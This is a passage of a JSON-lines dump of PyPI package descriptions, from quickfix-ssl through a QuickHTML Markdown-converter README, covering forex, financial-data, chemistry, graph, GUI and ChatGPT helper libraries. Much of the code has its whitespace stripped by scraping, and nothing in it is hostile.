"pacakge-description": "No description available on PyPI."} +{"package": "quickfix-postgres", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix-ssl", "pacakge-description": "This package is a fork of the Quickfix project that exposes the\nSSL capabilities of the library to Python. The pull request can\nbe foundhere.Differences to the officialquickfixpackage are:The SSLSocketInitiator and SSLSocketAcceptor are now available.UtcTimeStamp, UtcDate and UtcTimeOnly are now exposed.A getDateTime() method is added to UtcTimeStamp which will return\na python datetime.A setFromString() method is added to SessionSettingsLicense requirementsThe QuickFIX Software License, Version 1.0Copyright (c) 2001-2018 Oren MillerRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions\nare met:Redistributions of source code must retain the above copyright\nnotice, this list of conditions and the following disclaimer.Redistributions in binary form must reproduce the above copyright\nnotice, this list of conditions and the following disclaimer in\nthe documentation and/or other materials provided with the\ndistribution.The end-user documentation included with the redistribution,\nif any, must include the following acknowledgment:\n\"This product includes software developed by\nquickfixengine.org (http://www.quickfixengine.org/).\"\nAlternately, this acknowledgment may appear in the software itself,\nif and wherever such third-party acknowledgments normally appear.The names \"QuickFIX\" and \"quickfixengine.org\" must\nnot be used to endorse or promote products derived from this\nsoftware without prior written permission. For written\npermission, please contactask@quickfixengine.orgProducts derived from this software may not be called \"QuickFIX\",\nnor may \"QuickFIX\" appear in their name, without prior written\npermission of quickfixengine.orgTHIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED\nWARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL QUICKFIXENGINE.ORG OR\nITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF\nUSE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\nON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\nOF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\nSUCH DAMAGE."} +{"package": "quickfix-ssl-2", "pacakge-description": "No description available on PyPI."} +{"package": "quickfix-ssl-3", "pacakge-description": "No description available on PyPI."} +{"package": "quick-flask-server", "pacakge-description": "Quick Flask ServerA simple way to acess your Flask apps on the internet while running it on localhost.CompatabilityPython 3.6+ is required.Installationpipinstallquick-flask-serverQuickstartImport withfrom quick_flask_server import run_with_ngrokAddrun_with_ngrok(app)to make your Flask app available upon running# example.pyfromflaskimportFlaskfromquick_flask_serverimportrun_with_ngrokapp=Flask(__name__)run_with_ngrok(app)# Start ngrok when app is run@app.route(\"/\")defhello():return\"Hello World!\"if__name__=='__main__':app.run()Running the example:pythonquick_flask_server/example.py*Runningonhttp://127.0.0.1:5000/(PressCTRL+Ctoquit)*Runningonhttp://.ngrok.io*Trafficstatsavailableonhttp://127.0.0.1:4040You might also see this,You can copy the ngrok URL also from here.As shown in the above image ngrok has a web-interface which can be accessed at localhost:4040Here is a sample image of the web interface,"} +{"package": "quickflow", "pacakge-description": "No description available on PyPI."} +{"package": "quickforex", "pacakge-description": "quickforexQuick and easy access to foreign exchange rates. By default, this API usesexchangerate.hostas backend.Getting startedUsingquickforexfrom a Python scriptGet the last available rate for a single currency pairfromquickforeximportCurrencyPairimportquickforexquickforex.get_latest_rate(\"EUR/USD\")# -> Decimal(1.16)quickforex.get_latest_rate(\"EURUSD\")quickforex.get_latest_rate(\"EUR\",\"USD\")quickforex.get_latest_rate((\"EUR\",\"USD\"))quickforex.get_latest_rate(CurrencyPair(\"EUR\",\"USD\"))Get the last available rate for multiple currency pairsfromquickforeximportCurrencyPairimportquickforexquickforex.get_latest_rate(\"EUR/USD\",\"EUR/GBP\")# -> {CurrencyPair(\"EUR\", \"USD\"): Decimal(1.16), CurrencyPair(\"EUR\", \"GBP\"): Decimal(0.84)}quickforex.get_latest_rate([\"EUR/USD\",\"EUR/GBP\"])Get the historical rate for one or more currency pairsfromdatetimeimportdatefromquickforeximportCurrencyPairimportquickforexquickforex.get_historical_rate(\"BTC/USD\",as_of=date(year=2021,month=1,day=1))# -> Decimal(29388.20)quickforex.get_historical_rates(\"EUR/USD\",\"EUR/GBP\",as_of=date(year=2021,month=1,day=1))# -> {CurrencyPair(\"EUR\", \"USD\"): Decimal(1.21), CurrencyPair(\"EUR\", \"GBP\"): Decimal(0.89)}Get the rates for one or more currency pairs between two historical datesfromdatetimeimportdatefromquickforeximportCurrencyPairimportquickforexquickforex.get_rates_time_series(\"EURUSD\",\"EURGBP\",start_date=date(year=2020,month=1,day=1),end_date=date(year=2021,month=1,day=1))# -> {# CurrencyPair(\"EUR\", \"USD\"): {# date(year=2020, month=1, day=1): Decimal(1.12),# ...,# date(year=2021, month=1, day=1): Decimal(1.21)# },# CurrencyPair(\"EUR\", \"GBP\"): { ... }# }Usingquickforexfrom the command lineGet the last available rate for one or more currency pairs\u276fquickforexlatestEURUSDEURGBP{\"EUR\":{\"GBP\":0.846354,\"USD\":1.164798}}Get the historical rate for one or more currency pairs\u276fquickforexhistory--date2020-01-01EURUSDEURGBP{\"EUR\":{\"GBP\":0.8462,\"USD\":1.1221}}Get the rates for one or more currency pairs between two historical dates\u276fquickforexseries--from2020-01-01--to2020-12-31EURGBPEURUSDGBPJPY{\"EUR\":{\"GBP\":{\"2020-01-01\":0.8462,\"2020-01-02\":0.8466,\"2020-01-03\":0.8495,...\"2020-12-30\":0.903111,\"2020-12-31\":0.892135},\"USD\":{...}},\"GBP\":{\"JPY\":{...}}}"} +{"package": "quick_framework", "pacakge-description": "IntroductionNotice: this project is not suitable for public use yet. But it will soon, please stay tuned.\nQuick Framework is a Python web framework which enable you to develop a web site in minutes.Featuresquick: you could develop a blog or bbs system in minutes using quick framework. No other frameworks could be so quick."} +{"package": "quickfs", "pacakge-description": "QuickFS API SDKContentsGeneral descriptionRequirementsInstallationDemoDocumentationCompaniesMetricsDatapointsUsage historyDisclaimerGeneral description:arrow_up:This library is the Python :snake: unofficial SDK for the QuickFS REST API. It's intended to be used for data extraction for financial valuations.Requirements:arrow_up:You need to request an API key with the QuickFS team. Create your account in the followinglinkPython>= 3.8Installation:arrow_up:pipinstallquickfsDemo:arrow_up:The endpoints of the API will let you request fundamental data for your financial valuation. Here is a demo of its use:fromquickfsimportQuickFSimportos# load the key from the enviroment variablesapi_key=os.environ['API_QUICKFS']client=QuickFS(api_key)# Request reference data for the supported companiesresp=client.get_api_metadata()resp=client.get_supported_companies(country='US',exchange='NYSE')resp=client.get_updated_companies(country='US',date='20210420')# Available metrics in the APIresp=client.get_available_metrics()# Request fundamental data for each companyresp=client.get_data_range(symbol='AAPL:US',metric='shares_eop',period='FQ-15:FQ')resp=client.get_data_full(symbol='AAPL:US')resp=client.get_data_batch(companies=['KO:US','PEP:US'],metrics=['roa','roic'],period=\"FY-2:FY\")# Usage historyresp=client.get_usage()tutorial on how to save and load environment variables in Python ->Hiding Passwords and Secret Keys in Environment Variables (Windows)Documentation:arrow_up:All the methods will use the following instance of the general class:fromquickfsimportQuickFSimportos# load the key from the enviroment variablesapi_key=os.environ['API_QUICKFS']# client instanceclient=QuickFS(api_key)Companies:arrow_up:get_api_metadata: Returns the available countries and exchanges where to get data.arguments:*Noneusage:# get the metadata for the countries and exchanges.client.get_api_metadata()get_supported_companies: Returns a list of ticker symbols supported by QuickFS. You need to specify a country code (US, CA, MM, AU, NZ, MN, or LN). It is recommendable to use theget_api_metadatato get the references for each argument.arguments:country(str): quickfs code of the country to request data.exchange(str): quickfs code of the exchange to request data.usage:# get the companies for the NYSE exchangeNYSE=client.get_supported_companies(country='US',exchange='NYSE')# get the companies for the LSELSE=client.get_supported_companies(country='LN',exchange='LONDON')# get the companies from AustraliaASX=resp=client.get_supported_companies(country='AU',exchange='ASX')get_updated_companies: Returns a list of ticker symbols that were updated with new financial data on or after the specified date (formatted as YYYYMMDD). You need to specify a country code (US, CA, MM, AU, NZ, MN, or LN).arguments:country(str): quickfs code of the country to request data.date(str): specific date to request data, it should be written in the following format YYYYMMDD. Please be aware that may be a delay in the company update and the actual update in the quickfs database.usage# get the updated companies from New Zelandclient.get_updated_companies(country='NZ',date='20210420')Metrics:arrow_up:get_available_metrics: Returns a list of available metrics with the associated metadata.arguments:Noneusage:# get the supported metrics by quickfsclient.get_available_metrics()Datapoints:arrow_up:It is highly recommendable to use the country identifier code for non-U.S. stocks. If you do not specify a country, the API will first try to match a U.S.-listed symbol and, if none is found, will then match with a non-U.S. company with the same symbol. The order of the returned data is from oldest to more recent data.Additionally, the period or period range to query should have the following structureperiodorfrom:torespectively. For example, revenue is reported quarterly and annually, as determined by a company's fiscal calendar.FY-9:FYrepresents the last 10 years of annual revenue figures. Similarly, the last 20 quarters of reported quarterly revenue is characterised by the periodsFQ-19:FQ.get_data_range: Returns range of data points for a single company metric.arguments:symbol(str): company symbol. for example: AAPL:USmetric(str): QuickFS metric name.usage:# get the shares outstanding (shares that have been authorized, issued, and purchased by investors and are held by them).client.get_data_range(symbol='AAPL:US',metric='shares_eop',period='FQ-15:FQ')get_data_full: Pull metadata and all financial statements (annual and quarterly) for all periods for a single stock in one API call.arguments:symbol(str): company symbol. for example: AAPL:USusage:# get the full data for finnCap Group plcclient.get_data_full(symbol='FCAP:LN')get_data_batch: Batch request for several companies retrieving multiple metrics.arguments:companies(List[str]): List of companies to query.metrics(List[str]): List of metrics to query.period(str): Period or period range to query.usage:# Get the last 3 years of ROA and ROIC for Cocacola and Pepsiclient.get_data_batch(companies=['KO:US','PEP:US'],metrics=['roa','roic'],period=\"FY-2:FY\")Usage history:arrow_up:get_usage: Returns your current API usage and limits.arguments:Noneusage:client.get_usage()Disclaimer:arrow_up:The information in this document is for informational and educational purposes only. Nothing in this document may be construed as financial, legal or tax advice. The content of this document is solely the opinion of the author, who is not a licensed financial advisor or registered investment advisor. The author is not affiliated as a promoter of QuickFS services.This document is not an offer to buy or sell financial instruments. Never invest more than you can afford to lose. You should consult a registered professional advisor before making any investment."} +{"package": "quick-fuoss", "pacakge-description": "quick-fuossrapid estimation of ion-pair dissociation constantsDescriptionquick-fuossis an open-source Python 3 program designed to allow for quick estimation of ion-pair dissociation constants.\nTo run,quick-fuossrequires only the name of the cation and anion and the dielectric constant of the solvent in question.\nAlternatively,.xyzfiles can be supplied.quick-fuossrequires a working installation ofcctk, which does most of the heavy lifting.TheoryAs the name implies,quick-fuossuses the Fuoss model for modelling association/dissociation of idealized spherical ions in implicit solvent.1This approach is purely Coulombic and neglects any specific ion/ion interactions, as well as inner-sphere solvent effects (e.g. solvent coordination to transition metals).\nNevertheless, these approximations are reasonably satisfied for many common ion pairs.This model has been used to correct pKa values in relatively non-polar solvents: the present implementation is based on that literature.2,3Please note that the current implementation ofquick-fuossonly supports singly charged ions!Usagequick-fuosscan be used starting from either the names of the ions in question (requires Internet access) or.xyzfiles. Some examples are shown below:# Kd for sodium chloride in a solvent with dielectric constant 40\n$ python quick_fuoss.py sodium chloride 40\n\n# the same, but at -78 \u00baC\n$ python quick_fuoss.py --temp 195 sodium chloride 40\n\n# Kd of the chloride salt of cation.xyz in a solvent with dielectric constant 80\n$ python quick_fuoss.py cation.xyz chloride 80\n\n# Kd of the salt formed by combining cation.xyz and anion.xyz in a solvent with dielectric constant 12\n$ python quick_fuoss.py cation.xyz anion.xyz 12TestingThe calculated values are in reasonable agreement with reported values,4as seen below:$ python quick_fuoss.py tetraisoamylammonium nitrate 8.5\nReading ion #1 from rdkit...\nReading ion #2 from rdkit...\nDissociation constant:\t0.00004930 M\nIonization energy: 5.873 kcal/mol\n$ python quick_fuoss.py tetraisoamylammonium nitrate 11.9\nReading ion #1 from rdkit...\nReading ion #2 from rdkit...\nDissociation constant:\t0.00094706 M\nIonization energy: 4.122 kcal/molTo test that the program is working correctly, simply run:$ python test.py\nAll tests successful! (9 tests run in 14.91 seconds)ReferencesFuoss, R. M. Ionic Association III: The Equilibrium between Ion Pairs and Free Ions.J. Am. Chem. Soc.1958,80, 5059.Abdur-Rashid, K. et al. An Acidity Scale for Phosphorus-Containing Compounds Including Metal Hydrides and Dihydrogen Complexes in THF: Toward the Unification of Acidity Scales.J. Am. Chem. Soc.2000,122, 9155.Paenurk, E. et al. A unified view to Br\u00f8nsted acidity scales: do we need solvated protons?Chem. Sci.2017,8, 6964.Fuoss, R. M; Kraus, C. A. Properties of Electrolytic Solutions. III. The Dissociation Constant.J. Am. Chem. Soc.1933,55, 1019.Authors:quick-fuosswas written by Corin Wagen (Harvard University). Please emailcwagen@g.harvard.eduwith any questions or bug reports.How to Cite:Wagen, C.C.quick-fuoss2020,www.github.com/corinwagen/quick-fuoss.License:This project is licensed under the Apache License, Version 2.0. Please seeLICENSEfor full terms and conditions.Copyright 2020 by Corin Wagen"} +{"package": "quickgen", "pacakge-description": "No description available on PyPI."} +{"package": "quickgist", "pacakge-description": "UNKNOWN"} +{"package": "quickgpt", "pacakge-description": "example of quickgpt commandquickGPTis a lightweight and easy-to-use Python library that\nprovides a simplified interface for working with the new API interface\nof OpenAI\u2019s ChatGPT. With quickGPT, you can easily generate natural\nlanguage responses to prompts and questions using state-of-the-art\nlanguage models trained by OpenAI.For the record, this README was (mostly) generated with ChatGPT - hence\nthe braggy tone.Like fine wine and cheddar, this library pairs nicely with theElevenLabstext-to-speech\nAPI library.InstallationYou can installquickGPTusing pip:pipinstallquickgptUsageTo use quickgpt, you\u2019ll need an OpenAI API key, which you can obtain\nfrom the OpenAI website. Once you have your API key, you can specify\nyour API key using an environment variable:export OPENAI_API_KEY=\"YOUR_API_KEY_HERE\"or by passing it to theapi_keyparameter ofQuickGPT:chat = QuickGPT(api_key=\"YOUR_API_KEY_HERE\")See the examples for more information on how it works. Or, you can use\nthequickgpttool for an interactive ChatGPT session in your command\nline. Make sure~/.local/bin/is in your$PATH.usage: quickgpt [-h] [-k API_KEY] [-t THREAD] [-p PROMPT] [-l] [-n] [-i] [-v]\n\nInteractive command line tool to access ChatGPT\n\noptions:\n -h, --help show this help message and exit\n -k API_KEY, --api-key API_KEY\n Specify an API key to use with OpenAI\n -t THREAD, --thread THREAD\n Recall a previous conversation, or start a new one\n with the provided identifer\n -p PROMPT, --prompt PROMPT\n Specify the initial prompt\n -l, --list Lists saved threads\n -n, --no-initial-prompt\n Disables the initial prompt, and uses the User's first\n input as the prompt\n -i, --stdin Takes a single prompt from stdin, and returns the\n output via stdout\n -v, --version Returns the version of the QuickGPT library (and this\n command)DocumentationThere\u2019s no documentation yet. Stay tuned.ContributingIf you find a bug or have an idea for a new feature, please submit an\nissue on the GitHub repository. Pull requests are also welcome!LicenseThis project is licensed under the MIT License."} +{"package": "quick-gr", "pacakge-description": "make api doc quickly by python script"} +{"package": "quickgraph", "pacakge-description": "IntroductionQuickGraph library can help you get a quick overview of a social graph in an extremely convenient way. QuickGraph will show the basic information of a graph, plot the CDF of selected metrics, characterize the largest connected component (LCC).OverviewQuickGraph library can help you get a quick overview of a social graph in an extremely convenient way.\nShow the basic information of a graph, plot the CDF of selected metrics, characterize the largest connected component (LCC), compute representative structural hole related indexes.Copyright (C) <2021-2026> by Qingyuan Gong, Fudan University (gongqingyuan@fudan.edu.cn)Before InstallationPlease upgrade to Python 3.5System RequirementsWe have tested QuickGraph on both MacOSX (version 11.5.1) and Ubuntu (Version: 20.04 LTS). This library have not been tested on other platforms.UsagePlease run the following commond and install the dependent libiraires:Runconda config --add channels conda-forgeconda update \u2013allto make the libraries fit to the operation systemRunpip install python-igraphto install the iGraph libraryRunpip install leidenalgto help the modularity related analysisNote: Please change topip3 installif you are using Apple M1 ChipFunctionsquickgraph.info(G) returns the the basic information of a graph and plots the CDF of selected metrics.quickgraph.LCC_analysis(G) characterizes the largest connected component (LCC) of the input graph G on selected metrics.ExampleWe utilize the SCHOLAT Social Network dataset as one example.https://www.scholat.com/research/opendata/#social_network>>>importquickgraph>>>quickgraph.demo()NumberofNodes:16007,NumberofEdges:202248Avg.degree:25.2699,Avg.clusteringcoefficient:0.5486Modularity(Leidenalg):0.8651,Modularity(Label_Propagation):0.8372Numberofconnectedcomponents:5423,NumberofnodesinLCC:9583(59.8676%)Time(G_info):4.675LCC:Avg.degree=40.023,Avg.clusteringcoefficient=0.625,Modularity(Leidenalg):0.8551,Modularity(Label_Propagation):0.8209(rough)shortestpathlength=1:1(0.1%),2:26(2.6%),3:98(9.8%),4:162(16.2%),5:133(13.3%),6:65(6.5%),7:12(1.2%),8:3(0.3%),Avg.shortestpathlength=4.316Time(LCC):1.907LicenseSee the LICENSE file for license rights and limitations (MIT)."} +{"package": "quickgui", "pacakge-description": "Rapidly create GUI without any knowledge of wxpython=============================================jerryzhujian9_at_gmail.comTested under python 2.7To see your python versionin terminal: python -Vor in python: import sys; print (sys.version)inspired by gui2py, easygui=============================================Install:1) Requires wxPython 2.9.2.4 (tested under canopy)2) or you can install it first manually fromhttp://sourceforge.net/projects/wxpython/files/wxPython/2.9.2.4/Then https://pypi.python.org/pypi/quickguipip install quickguimethod 1&2 run: python myscript.py is fine3) For anacoda python (wxPython 3.0 tested)but remember to run: pythonw myscript.py instead of python myscript.pyUsage:import quickgui as qMessage(msg, seconds=10), messageDisplays a timed modal message box, timeout and cancel returns 0, ok returns 1XPrinter()Display a window to capture print outputif on, both terminal and window (updating gui will greatly increase script execution time)if off, only terminalMethods: on/offExamples:xprinter = XPrinter()xprinter.on()print 'will be shown on window'xprinter.off()print 'will be shown in terminal'xprinter.on()print 'on window again'for x in range(100):print \"I am a line of \" + str(x)# time.sleep(0.01)alert, confirm, getfile, setfile, getdir, inputsAlert(message, title=\"\", icon=\"exclamation\")# Shows a simple pop-up modal dialog.# icon = \"exclamation\", \"error\", \"question\", \"info\"Confirm(message=\"\", title=\"\", default=False, ok=False, cancel=False)# Asks for confirmation (yes/no or ok and cancel), returns True or False or None.# show yes/no by default# default sets the default button# ok shows OK; cancel shows CancelGetFile(directory='', filename='', multiple=False, wildcard='All Files (*.*)|*.*', title=\"Select file(s)\")# Shows a dialog to select files to open, return path(s) if accepted.# wildcard format: 'BMP files (*.bmp)|*.bmp|GIF files (*.gif)|*.gif''Pictures (*.jpeg,*.png)|*.jpeg;*.pngSetFile(directory='', filename='', overwrite=False, wildcard='All Files (*.*)|*.*', title=\"Save\"):# Shows a dialog to select file to save, return path(s) if accepted.# overwrite seems not work?GetDir(path=\"\", title='Select a directory')# Shows a dialog to choose a directory.values = Inputs(items=[], width=None, instruction='Click the button to read the help.', title='Ask for inputs')# Flexible dialog for user inputs.# Returns a value for each row in a list, e.g. [u'1001', u'female', u'', []]# textbox accepts a string or str(default) and returns a string or eval(string)# checkbox returns a bool# radiobox returns a string or ''# combobox returns a string or ''# listbox returns a list of strings or []# If cancels, returns Noneitems = [('ID:', ''),('ID:', 'siu8505'),('ID:', 1001),('IDs:', [1001, 1002]), ->textbox (internally converts data types)the first element is the labelthe second is the default value (e.g. an empty string, number or a list)('Logical Switch:', 'Checked?', False), ->checkBox (True/False)('Gender:', ['Female', 'Male'], 0), ->radiobox (0,1; -1 does not work)('Race:', ['Black', 'White', 'Other'], -1), ->combobox (-1 selects none)('Majors:(Can select more than one)',('Psychology','Math','Biology'), 0), ->listbox (multiple)the first is the labelthe second is the options:a string makes it a checkboxa list with two elements makes a radioboxa list with more than two elements makes a comboboxa tuple makes a listbox with multiple choice enabledthe third is the default value (True/False, index of the list or tuple)(''), ->blank linejust an empty string({'Selecte Input Directory...': \"GetDir()\"},''),({'Selecte Output Directory...': \"GetDir()\"},''),({'Save as...': \"SetFile()\"},''), ->button({'Selecte Files...': \"GetFile(multiple=True)\"},[]),->listbox (disabled)({\"Output File Name(*.csv):\": \"SetFile(directory='%s', filename='output.csv', wildcard='CSV Files (*.csv)|*.csv')\" % os.getcwd()}, '')]the general form is: ({button label: function in a string}, result from function is a str or list)the first is a dict with the key is the label, the value is the button event functionthe second is the type of the returned value from the button function'' means the button function returns a string[] means the button fucntion returns a listvalues = Inputs(items=items) # returns a list of inputs in the order displayed on the GUI (the insertion of blank line, i.e. ('') in the above example, does not interfere the order of returned values)"} +{"package": "quickhealth", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quickhtml", "pacakge-description": "QuickHTMLA simple Markdown to HTML preprocessor that doesn't require any third-party modules.Quickly generate HTML from Markdown, using Python.Technologies usedPythonRegExTable of contentsQuickHTMLTechnologies usedTable of contentsFile treeInstallationUsageSupported syntaxHeadingsAlternate heading syntaxParagraphsLine breaksEmphasisBoldItalicBold and italicBlockquotesListsOrdered listsUnordered listsCodeEscaping backticksCode blocksHorizontal RulesLinksAdding titles to linksEmails and URLsReference-style linksFormatting the referenceFormatting the definitionImagesAdding links to imagesEscaping charactersEscape sequencesContributingFile treeQuickHTML\n\u251c LICENSE Project license.\n\u251c quickhtml/ Main module directory.\n\u2502 \u251c __init__.py Executed when running the module directly.\n\u2502 \u251c __main__.py Ensures Python treats this directory as a package.\n\u2502 \u2514 quickhtml.py Main module file.\n\u251c README.md Project README.\n\u251c setup.py Module setup file.\n\u2514 tests/ Contains tests.\n \u251c integration_tests.py Integration tests.\n \u2514 unit_tests.py Unit tests.InstallationQuickHTML is a Python module, if Python is not already installed in your system, you can get the latest versionhereor using a package manager. pip should be installed with Python by default, if not, you can get ithere.QuickHTML can then be installed using pip, by runningpip install quickhtmlon the command line.UsageTo see how to use QuickHTML directly from the terminal, runpython -m quickhtml -h.To import QuickHTML in Python files, use:>>> import quickhtml\n>>> ...Theconvert()function accepts a string, and returns it formatted as HTML:>>> string = \"# This is a level 1 heading.\"\n>>> quickhtml.convert(string)\n'

This is a level 1 heading.

'\n>>> ...Theconvert_file()function accepts a file path, and returns the file content formatted as HTML:>>> file_path = \"./markdown_documents/example_document.md\"\n>>> quickhtml.convert_file(file_path)\n'

This is an example document.

'\n>>> ...Supported syntaxHeadingsTo create a heading, add a number of pound signs (#) before a word or phrase. The number of signs corresponds to the heading level, up to six levels. For example, to create a level three heading, use three pound signs (### This is a level three heading.).MarkdownHTMLOutput# This is a level 1 heading.

This is a level 1 heading.

This is a level 1 heading.## This is a level 2 heading.

This is a level 2 heading.

This is a level 2 heading.### This is a level 3 heading.

This is a level 3 heading.

This is a level 3 heading.#### This is a level 4 heading.

This is a level 4 heading.

This is a level 4 heading.##### This is a level 5 heading.
This is a level 5 heading.
This is a level 5 heading.###### This is a level 6 heading.
This is a level 6 heading.
This is a level 6 heading.Alternate heading syntaxAlternatively, add two or more equal (=) or minus signs (-) to the line after the text to create level 1 and level 2 headings, respectively.MarkdownHTMLOutputThis is a level 1 heading.====================

This is a level 1 heading.

This is a level 1 heading.This is a level 2 heading.--------------------

This is a level 2 heading.

This is a level 2 heading.ParagraphsUse a blank line to separate paragraphs.MarkdownHTMLOutputThisisaparagraph.

This is a paragraph.

This is a paragraph.This is a paragraph.This is another paragraph.

This is a paragraph.

This is another paragraph.

This is a paragraph.This is another paragraph.Line breaksEnd a line with two or more spaces to create a line break (
).MarkdownHTMLOutputThis is a paragraph.This is still the same paragraph.

This is a paragraph.
This is still the same paragraph.

This is a paragraph.This is still the same paragraph.Alternatively, the
tag can also be used directly to create line breaks, this is especially useful for adding line breaks in list and blockquote items.EmphasisEmphasis can be added by making text bold, italic, or both.BoldTo make text bold, add two asterisks (**) or underscores (__) before and after a word, phrase, or letter.MarkdownHTMLOutput**This is some bold text.**

This is some bold text.

This is some bold text.This is a __bold__ word.

This is a bold word.

This is aboldword.These are some **b**__o__**l**__d__ letters.

These are some bold letters.

These are someboldletters.ItalicTo make text italic, add an asterisk (*) or underscore (_) before and after a word, phrase, or letter.MarkdownHTMLOutput*This is some italic text.*

This is some italic text.

This is some italic text.This is an _italic_ word.

This is an italic word.

This is anitalicword.These are some *i*_t_*a*_l_*i*_c_ letters.

These are some italic letters.

These are someitalicletters.Bold and italicTo make text bold and italic, add three asterisks (***) or underscores (___) before and after a word, phrase, or letter.MarkdownHTMLOutput***This is some bold and italic text.***

This is some bold and italic text.

This is some bold and italic text.These are some ___bold and italic___ words.

These are some bold and italic words.

These are somebold and italicwords.These are some ***b***___o___***l***___d___ ***a***___n___***d*** ___i___***t***___a___***l***___i___***c*** letters.

These are some bold and italic letters.

These are someboldanditalicletters.BlockquotesTo create a blockquote, add a number of greater than signs (>) before a paragraph. To nest blockquotes, add a number of signs that is greater or lesser than the last one. For example, a level 1 blockquote (>) followed by a level 2 blockquote (>>).MarkdownHTMLOutput> This is a level 1 blockquote.

This is a level 1 blockquote.

This is a level 1 blockquote.> This is a level 1 blockquote.> This is another level 1 blockquote.> This is the third level 1 blockquote.

This is a level 1 blockquote.

This is another level 1 blockquote.

This is the third level 1 blockquote.

This is a level 1 blockquote.This is another level 1 blockquote.This is the third level 1 blockquote.>> This is a level 1 blockquote.>> This is a level 2 blockquote.>>> This is a level 3 blockquote.

This is a level 1 blockquote.

This is a level 2 blockquote.

This is a level 3 blockquote.

This is a level 1 blockquote.This is a level 2 blockquote.This is a level 3 blockquote.> This is a level 1 blockquote.>> This is a level 2 blockquote.>>> This is a level 3 blockquote.>> This is a level 2 blockquote.> This is a level 1 blockquote.

This is a level 1 blockquote.

This is a level 2 blockquote.

This is a level 3 blockquote.

This is a level 2 blockquote.

This is a level 1 blockquote.

This is a level 1 blockquote.This is a level 2 blockquote.This is a level 3 blockquote.This is a level 2 blockquote.This is a level 1 blockquote.> This is a level 1 blockquote.>> This is a level 2 blockquote.>>> This is a level 3 blockquote.> This is a level 1 blockquote.

This is a level 1 blockquote.

This is a level 2 blockquote.

This is a level 3 blockquote.

This is a level 1 blockquote.

This is a level 1 blockquote.This is a level 2 blockquote.This is a level 3 blockquote.This is a level 1 blockquote.At the moment, multiline items, such as multiline paragraphs, are not supported inside blockquotes. This means each line is a new item. To add line breaks in blockquote elements, use
tags directly.ListsItems can be organized into ordered and unordered lists.Ordered listsTo create an ordered list, add a number, followed by a period (.) or closing parenthesis ()), followed by a space before a paragraph. The numbers do not have to be in numerical order. To nest ordered lists, add a number of spaces before the number that is greater or lesser than the last number of spaces. For example, a level 1 ordered list (1.) followed by a level 2 ordered list. (1.)MarkdownHTMLOutput1. This is a level 1 ordered list item.2. This is another level 1 ordered list item.3. This is the third level 1 ordered list item.
  1. This is a level 1 ordered list item.
  2. This is another level 1 ordered list item.
  3. This is the third level 1 ordered list item.
This is a level 1 ordered list item.This is another level 1 ordered list item.This is the third level 1 ordered list item.1) This is a level 1 ordered list item.2) This is another level 1 ordered list item.3) This is the third level 1 ordered list item.
  1. This is a level 1 ordered list item.
  2. This is another level 1 ordered list item.
  3. This is the third level 1 ordered list item.
This is a level 1 ordered list item.This is another level 1 ordered list item.This is the third level 1 ordered list item.1. This is a level 1 ordered list item.1. This is another level 1 ordered list item.1. This is the third level 1 ordered list item.
  1. This is a level 1 ordered list item.
  2. This is another level 1 ordered list item.
  3. This is the third level 1 ordered list item.
This is a level 1 ordered list item.This is another level 1 ordered list item.This is the third level 1 ordered list item.82. This is a level 1 ordered list item.6. This is another level 1 ordered list item.14. This is the third level 1 ordered list item.
  1. This is a level 1 ordered list item.
  2. This is another level 1 ordered list item.
  3. This is the third level 1 ordered list item.
This is a level 1 ordered list item.This is another level 1 ordered list item.This is the third level 1 ordered list item.1. This is a level 1 ordered list item.2. This is another level 1 ordered list item.1. This is a level 2 ordered list item.2. This is another level 2 ordered list item.3. This is the third level 1 ordered list item.
  1. This is a level 1 ordered list item.
  2. This is another level 1 ordered list item.
    1. This is a level 2 ordered list item.
    2. This is another level 2 ordered list item.
  3. This is the third level 1 ordered list item.
This is a level 1 ordered list item.This is another level 1 ordered list item.This is a level 2 ordered list item.This is another level 2 ordered list item.This is the third level 1 ordered list item.1. This is a level 1 ordered list item.2. This is another level 1 ordered list item.1. This is a level 2 ordered list item.1. This is a level 3 ordered list item.3. This is the third level 1 ordered list item.
  1. This is a level 1 ordered list item.
  2. This is another level 1 ordered list item.
    1. This is a level 2 ordered list item.
      1. This is a level 3 ordered list item.
  3. This is the third level 1 ordered list item.
This is a level 1 ordered list item.This is another level 1 ordered list item.This is a level 2 ordered list item.This is a level 3 ordered list item.This is the third level 1 ordered list item.Unordered listsTo create an unordered list, add a minus sign (-), asterisk (*), or plus sign (+), followed by a space before a paragraph. To nest unordered lists, add a number of spaces before the minus sign (-), asterisk (*), or plus sign (+) that is greater or lesser than the last number of spaces. For example, a level 1 unordered list (-) followed by a level 2 unordered list. (-)MarkdownHTMLOutput- This is a level 1 unordered list item.- This is another level 1 unordered list item.- This is the third level 1 unordered list item.
  • This is a level 1 unordered list item.
  • This is another level 1 unordered list item.
  • This is the third level 1 unordered list item.
This is a level 1 unordered list item.This is another level 1 unordered list item.This is the third level 1 unordered list item.- This is a level 1 unordered list item.* This is another level 1 unordered list item.+ This is the third level 1 unordered list item.
  • This is a level 1 unordered list item.
  • This is another level 1 unordered list item.
  • This is the third level 1 unordered list item.
This is a level 1 unordered list item.This is another level 1 unordered list item.This is the third level 1 unordered list item.- This is a level 1 unordered list item.- This is another level 1 unordered list item.- This is a level 2 unordered list item.- This is another level 2 unordered list item.- This is the third level 1 unordered list item.
  • This is a level 1 unordered list item.
  • This is another level 1 unordered list item.
    • This is a level 2 unordered list item.
    • This is another level 2 unordered list item.
  • This is the third level 1 unordered list item.
